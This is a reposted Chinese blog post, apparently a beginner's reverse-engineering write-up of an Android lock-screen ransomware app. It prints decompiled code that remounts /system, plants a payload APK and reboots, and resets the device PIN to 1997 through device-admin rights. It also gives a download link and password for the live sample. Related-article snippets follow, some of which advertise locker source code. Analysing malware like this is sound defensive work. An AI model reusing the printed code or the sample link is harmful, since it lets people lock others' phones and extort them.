Android学习第七天---记录一次锁机软件的破解

最新推荐文章于 2023-11-25 11:44:15 发布
转载 最新推荐文章于 2023-11-25 11:44:15 发布 · 3.6k 阅读 · 5
文章标签:

#android

本文通过实战分析了一款恶意软件的工作原理和技术细节。该软件通过获取超级管理员权限,修改系统文件并设置固定的锁屏密码,展示了从安装过程到系统重启后的具体步骤。

自己学习别人的帖子实战一下试试吧 以后也能装逼 反正这两天心情不好不是很想学习

原贴

首先安装一下 app

提示需要超级管理员权限 一看就不是好东西 给呗

然后手机就从新启动了

然后就出现了 这个zz的界面 不停的播放音乐

这里写图片描述

上面标记的两个地方一个事输入的一个是按钮(二维码)基本上很多app都是这个套路 如果找不到可以到Android studio里面看一下框架就知道了

现在分析一下这个软件 拖到jeb里面

<activity android:label="@string/app_name" android:name=".c">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

去到dex里面找 c (smile)我看不懂 邮件 Decompile查看java代码

看看OnCreate方法,这个方法就是在窗口被打开的时候调用的:

 @Override protected void onCreate(Bundle arg10) {
        c v0 = this;
        LogCatBroadcaster.start(v0);
        super.onCreate(arg10);
        v0.setContentView(2130903040);
        v0.b = v0.findViewById(2131099651);
        v0.t = v0.findViewById(0);
        v0.b.setOnClickListener(new ButtonClickListener(v0));
        c v4 = v0;
        try {
            v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());
        }
        catch(IOException v4_1) {
        }
    }

主要看这两句

v0.b.setOnClickListener(new ButtonClickListener(v0));

v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());

第一句是给那个”点击打开悬浮窗”的按钮设置按钮事件 对应的是onClick方法 看一下

 @Override public void onClick(View arg8) {
            new b().rootShell();
            a.deleteFile(c.this.file);
        }

可以看到 我是60分java乱说 b新建了一个函数rootshell 我们到b.smile中看看去(大致可以才想到是获取root权限的)

void rootShell() {
        b.execCommand(new String[]{"mount -o rw,remount /system", "mount -o rw,remount /system/app", "cp /sdcard/zihao.l /system/app/", "chmod 777 /system/app/zihao.l", "mv /system/app/zihao.l /system/app/zihao.apk", "chmod 644 /system/app/zihao.apk", "reboot"}, true);
    }

可以看到大概就是把/sdcard/zihao.l这个文件当成一个APK安装到系统分区里,最后reboot就是重启,当然,他在期间申请了所需要的权限;

这个zihao.l是如何来的 回到c.smile里面 可以看到

 private void d(String arg13) throws IOException {
        FileOutputStream v3 = new FileOutputStream(arg13);
        InputStream v2 = this.getAssets().open("ijm-x86.so");
        byte[] v4 = new byte[1024];
        int v5;
        for(v5 = v2.read(v4); v5 > 0; v5 = v2.read(v4)) {
            v3.write(v4, 0, v5);
        }

        v3.flush();
        v2.close();
        v3.close();
    }

再看看这个 onCreate里面的

try {
            v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());
        }

这几句就是无限循环的读,读到没得读为止,边读边写,读谁?读自身存储路劲下的ijm-x86.so,然后写出到arg13这个路径,就是在前面传进来的那个路径:
v0.path在构造器中已经声明了是取SD卡根路径;
到这,第一层就结束了,手机开始重启,重启之后就会听到一首十分动听的歌曲

那我们来到第二层 将ijm-x86.so改为 ijm-x86.apk拖进jeb里面分析一下

还是先看MainFast.xml

<activity android:label="@string/app_name" android:name=".M">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

” android:name=”.M” 嗯..先看看m.smile

 private void activiteDevice() {
        Class v8;
        M v0 = this;
        Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
        ComponentName v5 = null;
        ComponentName v6 = null;
        M v7 = v0;
        try {
            v8 = Class.forName("com.h.MyAdmin");
        }
        catch(ClassNotFoundException v5_1) {
            throw new NoClassDefFoundError(v5_1.getMessage());
        }

        super(((Context)v7), v8);
        v1.putExtra("android.app.extra.DEVICE_ADMIN", ((Parcelable)v5));
        v0.startActivityForResult(v1, 0);
    }

    @Override public void onCreate(Bundle arg6) {
        LogCatBroadcaster.start(this);
        super.onCreate(arg6);
        this.activiteDevice();
    }

意思就是启动MyAdmin这个receiver 我们进入MyAdmin看看

 @Override public CharSequence onDisableRequested(Context arg10, Intent arg11) {
        String v4 = Integer.toString(1997);
        this.getManager(arg10).lockNow();
        this.getManager(arg10).resetPassword(v4, 0);
        return super.onDisableRequested(arg10, arg11);
    }

主要就是把锁屏的 pin 码设置为 1997,然后又启动了 s 这个服务,那来看看这个 s 把;
好乱啊.. 全部无视直接看 onCreate 和 onStart


    @Override public void onCreate() {
        s v0 = this;
        super.onCreate();
        v0.pass = ((long)(Math.random() * (((double)155))));
        v0.passw = new Long((v0.pass + (((long)7176))) * (((long)7)));
        v0.des = new DU("flower");
        s v3 = v0;
        try {
            v3.des = new DU(v0.des.decrypt("c29fe56fa59ab0db"));
        }
        catch(Exception v3_1) {
        }

        v0.share = v0.getSharedPreferences("Flowers", 0);
        v0.editor = v0.share.edit();
        if(v0.share.getLong("m", ((long)0)) == (((long)0))) {
            v0.editor.putLong("m", v0.pass);
            v0.editor.commit();
            v3 = v0;
            try {
                v3.editor.putString("passw", v0.des.encrypt(new StringBuffer().append("").append(v0.passw).toString()));
                v0.editor.commit();
            }
            catch(Exception v3_1) {
            }

            if(v0.is(v0.getApplicationContext())) {
                v0.ppss = new StringBuffer().append(v0.share.getLong("m", ((long)8))).append("").toString();
                v3 = v0;
                s v4 = v0;
                try {
                    v3.password = v4.des.decrypt(v0.share.getString("passw", ""));
                }
                catch(Exception v3_1) {
                }

                new 100000000(v0).start();
                return;
            }

            v3 = v0;
            try {
                v3.editor.putLong("m", Long.parseLong(v0.des.decrypt("5a15e58cc8db8d1c700ecb6bb7b627a9")));
                v0.editor.commit();
                v0.editor.putString("passw", "5a15e58cc8db8d1c700ecb6bb7b627a9");
                v0.editor.commit();
            }
            catch(Exception v3_1) {
            }
        }
    }

这里一看就是加解密的 请教大土豆师傅 师傅叫我smali插桩 这个是要学习学习 肯定有用 开始跑题 算了 就先这样把这个分析完吧 下一篇学习smali插桩

这里可一看到是用 c29fe56fa59ab0db解出来的值作为密钥

然后再解密

秘钥就是 “ (序列号++7176)*7 ”

恶意软件下载地址

样品:链接: http://pan.baidu.com/s/1kVdav8F 密码: 8wtz

成功解锁

删除的方法 adb 连接 进去删除 有些可以直接这样删除 就不用那么麻烦了

我的Android进阶之旅------>Android中编解码学习笔记
字节卷动
09-26 1万+
编解码学习笔记(一):基本概念 媒体业务是网络的主要业务之间。尤其移动互联网业务的兴起,在运营商和应用开发商中,媒体业务份量极重,其中媒体的编解码服务涉及需求分析、应用开发、释放license收费等等。最近因为项目的关系,需要理清媒体的codec,比较搞的是,在豆丁网上看运营商的规范 标准,同一运营商同样的业务在不同文档中不同的要求,而且有些要求就我看来应当是历史的延续,也就是现在已经很少采
上课点名app_【APP种草】网瘾少年的自我救赎之最强机软件
weixin_30651345的博客
01-02 669
相信在这个魔幻的2020,大家都经历了很多个不寻常吧。作为学生党,算是圆梦了在家学习的愿望,可当这一切都变成现实的时候,也还是没逃过点名、没逃过网课,这不,连期末考也又双叕叕地来了。作为一名需要在家完成期末考的网瘾少年,手机自然而然地成为了天敌。一边面对着堆积成山的学科书,一边接收着手机微博的实时推送,焦虑与快乐并存。但是毕竟是一名有骨气的医学生,最后的倔强就是战胜手机依赖。于是,通过很多安利贴,...
远离手机定时机APP(学习/工作/考研/免费/安全)
tzqwqtzqwq的博客
04-25 874
明明要考研,不带手机吧,中午去食堂没玩的,而且也怕万一有紧急事情会联系不到我;带手机吧,控制不住自己,学习碰到难题了,总想刷会儿抖音打局游戏逃避一下,然后时间就没了… 应用商店搜了搜,那些机软件不是得会员,就是各种广告,反正对我这种穷B大学生很不友好 ̄へ ̄。所以干脆就按照自己思路写了个,觉得效果还不错,想分享给想用的小伙伴们。 ...
安卓机软件
09-02
安卓机软件,基于安卓底层,住屏幕,必须用密码才能打开!
android 屏应用,推荐几款好用的安卓(Android)手机屏软件
weixin_35097346的博客
05-27 2082
还记得小编以前有一次手机在口袋里面自动拨号,与别人通话N分钟,小编心疼那个话费呀~手机拥有一款很好用的屏软件非常的有必要。安卓系统手机屏软件很多,非常的丰富,到底哪一款屏软件最好用呢?下面,小编推荐几款好用的Android屏软件,如果觉得合适就来下载试试吧!软件一:摇一摇自动屏 ShackedLocked v1.0软件介绍:摇一摇自动屏是一款便捷的屏工具,开启屏服务后,您只需上下摇...
安卓机源码软件源码非易语言源码
06-06
安卓机源码软件源码非易语言源码 此源码是点睛网赚会员投稿来的最新源码 解压密码dianjingwz_com 据说这个源码很牛B转化挺高的 大家拿可以自己用也可以卖钱来的!!
多层Android机软件,OffScreen
weixin_31539461的博客
05-31 945
OffScreen机app是一款非常好用的帮助用户可以更好的利用时间,不浪费时间在玩手机玩游戏的事情上的一款软件,可以让你的时间得到最大的工作效率,可以让你对一件事情变得更加的专注,感兴趣的朋友赶紧下载OffScreen机app开始使用吧!OffScreen机软件介绍一玩手机就停不下来?被短视频、新闻、游戏占用了太多时间?OffScreen帮助您控制手机使用时长,更多专注学习和生活,回归自律...
逆向android-让你也能开发微信的xposed插件-手机root(一)
钢铁烈阳--非花非雾
04-28 3985
一个root过的手机可以让你随心所欲的控制手机上的所有功能,配合xposed框架,可以让你拦截所有应用的执行。Xposed 框架是一款可以在不修改 APK 的情况下影响程序运行(修改系统)的框架服务,基于它可以制作出许多功能强大的模块,且在功能不冲突的情况下同时运作(目前支持10.0以下的android系统)。但是该框架在2017年已经停止维护,但是后续又出现了不少优秀的类Xposed框架,
android个人消费记录软件-拖控件作品.rar
12-16
这个名为"android个人消费记录软件-拖控件作品"的项目,旨在为用户提供一个便捷的消费记录工具。通过拖放操作,用户可以轻松输入、整理和分析消费数据,使个人财务管理变得更加直观和高效。此软件不仅展示了Android...
LumaQQ-Android qq 代码.rar
09-09
《深入解析LumaQQ-Android QQ源码》 在移动互联网时代,QQ作为一款流行的即时通讯软件,其背后的代码架构和实现...同时,这也是一次理论与实践相结合的学习过程,有助于开发者在面对实际问题时能迅速找到解决方案。
Android代码-定手机(定屏幕,戒手机)
08-06
LockSurface 定手机界面,使无法正常操作,让您暂时离开手机,而专注于眼下比玩手机更重要的事。 本应用是作者系统研究安卓的 Window 的阶段性总结 使用须知 本应用通过一点并不复杂的技术实现定手机主屏幕,使主屏幕区域无法再接收任何触摸事件(最长两天),适用的应用场景有戒一段时间手机以保持专注做其他更重要的事,防止熊孩子以及其他你不愿意让其碰你手机的人碰你手机。这里所言的主屏幕并不包括状态栏(显示信号和电量的顶部那一条)和导航栏(虚拟按键或实体按键),也就是定后你仍可以拉出通知栏并操作。当然国内的很多定制版 安卓 ROM 都仿苹果的 UI 风格,所以可能能从界面下方划出操作栏,这点作者本人并没做测试,所以欢迎大家反馈。总结起来就是本应用无法定的界面包括通知栏,控制栏(这点存疑,等你们给我反馈。)状态栏,导航栏,以及屏界面。任何导致应用在后台被意外杀死的事件都会导致定被解除,所以如果您安装有绿色守护,阻止运行等应用请把此应用加入白名单。本应用在作者本人的原生系 ROM 上面使用效果还是很给力的,所以劝大家慎用。 安装包下载 LockSurface 界面预览
安卓机源码
02-15
安卓机源码! 已经反复修改! 这个源码是我买别人的希望大家多多看看! 这点积分应该不多吧! 值得你去研究!
Android机软件开发原理
12-18
Android机软件原理解析,解决高并发的问题,视频教程,视频都是大牛老师讲解的,我花钱买的,跟大家分享。
aidejava源码大全-TimLiu-Android:TimLiu-Android
06-04
aide java源码大全 TimLiu-Android 目录 ======== 具体内容 ============================= ======== UI - MaterialDesignCenter改名为Awesome-MaterialDesign,优化了布局,新增了不少库。 - ui库,非常多的ui及特效。 -Android EditText中实现打Tag功能。 - 拉窗帘效果。 - 在滚动的视图观测滚动事件的Android库 它易于与在Android 5.0 Lollipop中引入的工具条Toolbar相交互,并能够帮助实现Material Design apps的外观。 - iconify 图片与文字同一行显示。 - The Google I/O 2014 Android App,Android 5.0 and Material Design。 - MaterialList 。 - material design card 。 - 本APP用来演示Material Design控件的使用。 , 。 - InstalMaterial 项目(非常多的UI样式
Android反编译机文件
Android_machong的博客
11-22 3234
今天给大家带来一个反编译的教程,一朋友说找一个刷QQ名片赞的app,结果刚打开后手机就被住了 重启手机还会出现这个东西,下面有作者的qq,难不成真联系作者?  联系个球,不墨迹直接干! 首先打开我们的Android逆向助手(点击去下载),然后选择反编译apk,浏览apk的位置 点操作 反编译apk... 源:C:\Users\Administrator.WIN-D10JMSANM
Android 一键屏的实现
xiaowang_lj的博客
11-25 1625
1.activity里的代码 获取设备管理器。5.device_admin 文件。2.动态注册设备管理器的授权广播。4.menifest文件。
机病毒小结
有点瘦的专栏
08-17 4638
机勒索病毒主要特征、关键代码以及应对方式。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值